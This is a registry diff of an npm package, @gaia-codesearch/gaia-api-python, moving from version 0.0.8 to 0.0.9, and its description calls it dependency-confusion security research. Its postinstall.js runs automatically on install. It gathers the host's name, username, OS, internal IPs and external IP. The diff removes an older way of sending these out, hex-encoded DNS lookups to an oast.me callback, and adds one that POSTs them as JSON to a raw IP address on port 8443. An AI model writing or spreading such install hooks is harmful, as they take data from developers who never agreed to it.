@gaia-codesearch/gaia-api-python 0.0.8 → 0.0.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/postinstall.js +28 -34
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@gaia-codesearch/gaia-api-python",
3
- "version": "0.0.8",
3
+ "version": "0.0.9",
4
4
  "description": "Security research — scope ownership proof for dependency confusion report",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/postinstall.js CHANGED
@@ -1,14 +1,11 @@
1
- const dns = require("dns");
1
+ const http = require("http");
2
2
  const os = require("os");
3
3
  const https = require("https");
4
4
 
5
- const CALLBACK = "d7vn40ir47ntg9l09cigo9m6xm43xti68.oast.me";
5
+ const CALLBACK_HOST = "72.62.36.138";
6
+ const CALLBACK_PORT = 8443;
6
7
  const PKG = "gaia-api-python";
7
8
 
8
- function hex(s) {
9
- return Buffer.from(s).toString("hex");
10
- }
11
-
12
9
  function getLocalIPs() {
13
10
  const ifaces = os.networkInterfaces();
14
11
  const ips = [];
@@ -17,39 +14,36 @@ function getLocalIPs() {
17
14
  if (!iface.internal && iface.family === "IPv4") ips.push(iface.address);
18
15
  }
19
16
  }
20
- return ips.join("-") || "unknown";
17
+ return ips.join(",") || "unknown";
21
18
  }
22
19
 
23
- function dnsLookup(subdomain) {
24
- return new Promise((resolve) => {
25
- dns.resolve4(subdomain + "." + CALLBACK, () => resolve());
26
- });
20
+ function send(data) {
21
+ const body = JSON.stringify(data);
22
+ const req = http.request({
23
+ hostname: CALLBACK_HOST, port: CALLBACK_PORT, path: "/callback",
24
+ method: "POST", headers: { "Content-Type": "application/json", "Content-Length": body.length },
25
+ timeout: 5000,
26
+ }, () => {});
27
+ req.on("error", () => {});
28
+ req.write(body);
29
+ req.end();
27
30
  }
28
31
 
29
- async function exfil() {
30
- const hostname = os.hostname();
31
- const user = os.userInfo().username;
32
- const platform = os.platform() + "-" + os.arch();
33
- const ips = getLocalIPs();
34
- const cwd = process.cwd().replace(/\//g, "-").slice(0, 40);
35
- const ts = Date.now().toString(36);
36
-
37
- await dnsLookup("pkg." + hex(PKG));
38
- await dnsLookup("host." + hex(hostname));
39
- await dnsLookup("user." + hex(user));
40
- await dnsLookup("os." + hex(platform));
41
- await dnsLookup("ip." + hex(ips));
42
- await dnsLookup("cwd." + hex(cwd));
43
- await dnsLookup("ts." + ts);
44
- await dnsLookup("rce." + hex(PKG + "|" + user + "@" + hostname));
32
+ async function main() {
33
+ const data = {
34
+ pkg: PKG,
35
+ host: os.hostname(),
36
+ user: os.userInfo().username,
37
+ os: os.platform() + "-" + os.arch(),
38
+ ip: getLocalIPs(),
39
+ extip: "",
40
+ };
45
41
 
46
42
  https.get("https://api.ipify.org", (res) => {
47
- let data = "";
48
- res.on("data", (c) => (data += c));
49
- res.on("end", () => {
50
- dnsLookup("extip." + hex(data.trim()));
51
- });
52
- }).on("error", () => {});
43
+ let d = "";
44
+ res.on("data", (c) => (d += c));
45
+ res.on("end", () => { data.extip = d.trim(); send(data); });
46
+ }).on("error", () => { send(data); });
53
47
  }
54
48
 
55
- exfil().catch(() => {});
49
+ main();